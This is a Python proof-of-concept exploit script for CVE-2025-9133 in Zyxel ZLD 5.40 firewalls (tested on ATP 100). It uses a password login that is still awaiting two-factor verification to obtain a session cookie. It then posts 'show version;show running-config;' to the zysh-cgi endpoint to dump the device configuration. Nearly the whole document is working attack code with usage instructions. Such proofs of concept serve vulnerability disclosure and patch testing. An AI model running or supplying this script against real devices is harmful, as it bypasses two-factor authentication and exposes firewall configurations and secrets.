# Date: 2025-08-14
# Exploit Title: ZYXEL ZLD 5.40 Missing Authorization
# Exploit Author: Alessandro Sgreccia (@rainpwn) <rainpwn@protonmail.com>
# Author Homepage: https://rainpwn.blog/
# Vendor Homepage: https://www.zyxel.com/
# Tested Version: ATP 5.40 (ABPS.0)
# Tested on: ATP 100
# CVE: CVE-2025-9133
#
# Example:
#  1. Launch this script to get running config as semi-authenticated user.
#    > python3 main.py <url> <port> <admin_2FA> <password>

import requests
from requests import Session
from urllib3.exceptions import InsecureRequestWarning
import sys

# Suppress the warnings from urllib3
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

s = Session()

try:
    USERNAME=sys.argv[3]
    PASSWORD=sys.argv[4]
    FW_URL=f"https://{sys.argv[1]}:{sys.argv[2]}"
    WEBLOGIN_URL=f"/weblogin.cgi?username={USERNAME}&password={PASSWORD}"
    ZYSH_CGI="/cgi-bin/zysh-cgi"
except IndexError:
    print("python3 main.py <url> <port> <admin_2FA> <password>")
    exit(1)

login = s.get(FW_URL+WEBLOGIN_URL, verify=False)

if "2FA" in login.text:
    print("2FA enabled, trying to get config..")

    cookies = {
        'authtok': s.cookies.get("authtok"),
    }

    headers = {
        'Accept': '*/*',
        'Accept-Language': 'it,it-IT;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6',
        'Cache-Control': 'no-cache',
        'Connection': 'keep-alive',
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
        'Origin': f'{FW_URL}',
        'Pragma': 'no-cache',
        'Referer': f"{FW_URL}/ext-js/app/view/object/authmeth/twoFA/2FAVerify.html?nextpage=ext-js/index.html",
        'Sec-Fetch-Dest': 'empty',
        'Sec-Fetch-Mode': 'cors',
        'Sec-Fetch-Site': 'same-origin',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 Edg/139.0.0.0',
        'X-Requested-With': 'XMLHttpRequest',
        'sec-ch-ua': '"Not;A=Brand";v="99", "Microsoft Edge";v="139", "Chromium";v="139"',
        'sec-ch-ua-mobile': '?0',
        'sec-ch-ua-platform': '"Windows"',
    }

    data = {
        'filter': 'js2',
        'cmd': [
            'show version;show running-config;'
        ],
        'write': '0',
    }

    response = requests.post(
        f'{FW_URL}{ZYSH_CGI}',
        cookies=cookies,
        headers=headers,
        data=data,
        verify=False,
    )
    
    if "!" in response.text:
        print(response.text)
    else:
        print("Something went wrong!")
else:
    print("Invalid credentials.")